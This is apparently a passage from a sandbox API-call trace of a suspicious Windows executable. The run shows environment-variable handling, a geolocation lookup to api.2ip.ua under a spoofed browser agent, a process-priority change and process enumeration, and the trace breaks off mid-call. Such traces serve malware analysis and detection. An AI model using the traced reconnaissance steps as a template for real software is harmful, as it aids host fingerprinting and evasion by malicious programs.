lpMultiByteStr="ProgramData=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 27 [0072.118] GetLastError () returned 0x0 [0072.118] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x771298) returned 0x58 [0072.119] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x771298, Size=0x5c) returned 0x771298 [0072.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0072.119] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x24) returned 0x76a9a8 [0072.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x76a9a8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 36 [0072.119] GetLastError () returned 0x0 [0072.119] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x771298) returned 0x5c [0072.119] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x771298, Size=0x60) returned 0x771298 [0072.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0072.119] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x29) returned 0x76b0b8 [0072.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x76b0b8, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles(x86)=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 41 [0072.119] GetLastError () returned 0x0 [0072.119] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x771298) returned 0x60 [0072.119] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x771298, Size=0x64) returned 0x771298 [0072.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0072.119] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x1e) returned 0x76f098 [0072.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x76f098, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramW6432=C:\\Program Files", lpUsedDefaultChar=0x0) returned 30 [0072.119] GetLastError () returned 0x0 [0072.119] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x771298) returned 0x64 [0072.119] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x771298, Size=0x68) returned 0x771298 [0072.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0072.119] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x41) returned 0x766b68 [0072.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x766b68, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpUsedDefaultChar=0x0) returned 65 [0072.119] GetLastError () returned 0x0 [0072.119] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x771298) returned 0x68 [0072.119] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x771298, Size=0x6c) returned 0x771298 [0072.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0072.119] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x17) returned 0x771310 [0072.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x771310, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBLIC=C:\\Users\\Public", lpUsedDefaultChar=0x0) returned 23 [0072.119] GetLastError () returned 0x0 [0072.119] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x771298) returned 0x6c [0072.120] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x771298, Size=0x70) returned 0x771298 [0072.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0072.120] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0xf) returned 0x76e600 [0072.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x76e600, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemDrive=C:", lpUsedDefaultChar=0x0) returned 15 [0072.120] GetLastError () returned 0x0 [0072.120] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x771298) returned 0x70 [0072.120] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x771298, Size=0x74) returned 0x771330 [0072.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0072.120] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x16) returned 0x771298 [0072.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x771298, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemRoot=C:\\Windows", lpUsedDefaultChar=0x0) returned 22 [0072.120] GetLastError () returned 0x0 [0072.120] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x771330) returned 0x74 [0072.120] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x771330, Size=0x78) returned 0x771330 [0072.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0072.120] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x2a) returned 0x76b0f0 [0072.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x76b0f0, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 42 [0072.120] GetLastError () returned 0x0 [0072.120] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x771330) returned 0x78 [0072.120] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x771330, Size=0x7c) returned 0x771330 [0072.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0072.120] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x29) returned 0x76b128 [0072.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x76b128, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 41 [0072.120] GetLastError () returned 0x0 [0072.120] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x771330) returned 0x7c [0072.120] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x771330, Size=0x80) returned 0x771330 [0072.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0072.121] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x15) returned 0x7712b8 [0072.121] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x7712b8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERDOMAIN=XDUWTFONO", lpUsedDefaultChar=0x0) returned 21 [0072.121] GetLastError () returned 0x0 [0072.121] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x771330) returned 0x80 [0072.121] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x771330, Size=0x84) returned 0x771330 [0072.121] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0072.121] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x1e) returned 0x76f0c0 [0072.121] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x76f0c0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERNAME=5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 30 [0072.121] GetLastError () returned 0x0 [0072.121] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x771330) returned 0x84 [0072.121] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x771330, Size=0x88) returned 0x771330 [0072.121] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0072.121] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x2a) returned 0x76b160 [0072.121] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x76b160, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 42 [0072.121] GetLastError () returned 0x0 [0072.121] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x771330) returned 0x88 [0072.121] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x771330, Size=0x8c) returned 0x771330 [0072.121] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0072.121] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x12) returned 0x7712d8 [0072.121] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x7712d8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windir=C:\\Windows", lpUsedDefaultChar=0x0) returned 18 [0072.121] GetLastError () returned 0x0 [0072.121] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x771330) returned 0x8c [0072.121] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x771330, Size=0x90) returned 0x771330 [0072.121] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0072.121] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x18) returned 0x7713c8 [0072.121] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x7713c8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_flags=3", lpUsedDefaultChar=0x0) returned 24 [0072.121] GetLastError () returned 0x0 [0072.122] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x771330) returned 0x90 [0072.122] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x771330, Size=0x94) returned 0x7713e8 [0072.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0072.122] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x46) returned 0x766bb8 [0072.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x766bb8, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", lpUsedDefaultChar=0x0) returned 70 [0072.122] GetLastError () returned 0x0 [0072.122] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x7713e8) returned 0x94 [0072.122] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x7713e8, Size=0x98) returned 0x7713e8 [0072.122] GetLastError () returned 0x0 [0072.181] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x770da8) returned 0x80 [0072.181] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x770da8) returned 0x80 [0072.181] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x770da8) returned 0x80 [0072.192] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x8ec) returned 0x771488 [0072.246] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x770da8) returned 0x80 [0072.246] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x10) returned 0x76e618 [0072.247] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x770da8) returned 0x80 [0072.247] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x770da8) returned 0x80 [0072.247] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x770da8) returned 0x80 [0072.332] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x770da8) returned 0x80 [0072.347] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0074.995] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x765390 [0074.995] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="https://api.2ip.ua/geo.json", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0093.871] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x18aa20, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x18d220 | out: lpBuffer=0x18aa20*, lpdwNumberOfBytesRead=0x18d220*=0x1d0) returned 1 [0093.873] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0093.890] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0093.966] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x77d5a0 [0093.996] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x1e0) returned 0x31e3150 [0094.022] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x31e3150 | out: hHeap=0x750000) returned 1 [0094.062] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x77d5a0 | out: hHeap=0x750000) returned 1 [0094.062] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x765390 | out: hHeap=0x750000) returned 1 [0094.070] GetCurrentProcess () returned 0xffffffff [0094.070] GetLastError () returned 0x2 [0094.070] SetPriorityClass (hProcess=0xffffffff, dwPriorityClass=0x80) returned 1 [0094.084] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x10) returned 0x79f810 [0094.093] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x8ec) returned 0x31f6278 [0094.100] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x800) returned 0x7ab458 [0094.100] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7ab458, nSize=0x400 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h1rxxmjek7fnkhtt.exe")) returned 0x3a [0094.100] PathRemoveFileSpecW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0094.118] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x810) returned 0x31f6b70 [0094.118] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe\" " [0094.118] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe\" ", pNumArgs=0x18d300 | out: pNumArgs=0x18d300) returned 0x798850*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe" [0094.118] lstrcpyW (in: lpString1=0x18df90, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe" [0094.136] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe\" " [0094.137] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe\" ", pNumArgs=0x18d29c | out: pNumArgs=0x18d29c) returned 0x798850*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe" [0094.137] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe") returned="h1rxxmJek7fnkHTT.exe" [0094.137] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0094.138] GetProcAddress (hModule=0x76d30000, lpProcName="EnumProcesses") returned 0x0 [0094.139] GetProcAddress (hModule=0x76d30000, lpProcName="EnumProcessModules") returned 0x0 [0094.139] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleBaseNameW") returned 0x0 [0094.139] LoadLibraryW (lpLibFileName="Psapi.dll") returned 0x77060000 [0094.194] GetProcAddress (hModule=0x77060000, lpProcName="EnumProcesses") returned 0x77061544 [0094.194] GetProcAddress (hModule=0x77060000, lpProcName="EnumProcessModules") returned 0x77061408 [0094.195] GetProcAddress (hModule=0x77060000, lpProcName="GetModuleBaseNameW") returned 0x7706152c [0094.195] EnumProcesses (in: lpidProcess=0x182a98, cb=0xa000, lpcbNeeded=0x18d2a8 | out: lpidProcess=0x182a98, lpcbNeeded=0x18d2a8) returned 1 [0094.199] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0094.200] CloseHandle (hObject=0x0) returned 0 [0094.200] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0094.200] CloseHandle (hObject=0x0) returned 0 [0094.200] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0094.200] CloseHandle (hObject=0x0) returned 0 [0094.200] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0094.200] CloseHandle (hObject=0x0) returned 0 [0094.200] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0094.200] CloseHandle (hObject=0x0) returned 0 [0094.200] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0094.200] CloseHandle (hObject=0x0) returned 0 [0094.200] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0094.200] CloseHandle (hObject=0x0) returned 0 [0094.200] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0094.200] CloseHandle (hObject=0x0) returned 0 [0094.200] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0094.200] CloseHandle (hObject=0x0) returned 0 [0094.200] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0094.201] CloseHandle (hObject=0x0) returned 0 [0094.201] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x250) returned 0x0 [0094.201] CloseHandle (hObject=0x0) returned 0 [0094.201] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0094.201] CloseHandle (hObject=0x0) returned 0 [0094.201] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0094.201] CloseHandle (hObject=0x0) returned 0 [0094.201] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x338) returned 0x0 [0094.201] CloseHandle (hObject=0x0) returned 0 [0094.201] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x370) returned 0x0 [0094.201] CloseHandle (hObject=0x0) returned 0 [0094.201] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3ac) returned 0x0 [0094.201] CloseHandle (hObject=0x0) returned 0 [0094.201] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc8) returned 0x0 [0094.202] CloseHandle (hObject=0x0) returned 0 [0094.202] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x11c) returned 0x0 [0094.202] CloseHandle (hObject=0x0) returned 0 [0094.202] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x444) returned 0x5b8 [0094.202] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 0 [0094.202] CloseHandle (hObject=0x5b8) returned 1 [0094.202] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x454) returned 0x5b8 [0094.202] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 0 [0094.202] CloseHandle (hObject=0x5b8) returned 1 [0094.202] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x47c) returned 0x0 [0094.202] CloseHandle (hObject=0x0) returned 0 [0094.202] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4bc) returned 0x0 [0094.202] CloseHandle (hObject=0x0) returned 0 [0094.203] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5b8 [0094.203] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 0 [0094.203] CloseHandle (hObject=0x5b8) returned 1 [0094.203] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x588) returned 0x5b8 [0094.203] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 0 [0094.203] CloseHandle (hObject=0x5b8) returned 1 [0094.203] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6fc) returned 0x5b8 [0094.203] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.204] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x10e0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="lemon going student.exe") returned 0x17 [0094.205] CloseHandle (hObject=0x5b8) returned 1 [0094.205] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7b4) returned 0x5b8 [0094.205] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.206] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0xf10000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="telling.exe") returned 0xb [0094.207] CloseHandle (hObject=0x5b8) returned 1 [0094.207] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x90) returned 0x5b8 [0094.207] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.208] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x970000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="pumps wallpaper.exe") returned 0x13 [0094.209] CloseHandle (hObject=0x5b8) returned 1 [0094.209] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x67c) returned 0x5b8 [0094.209] 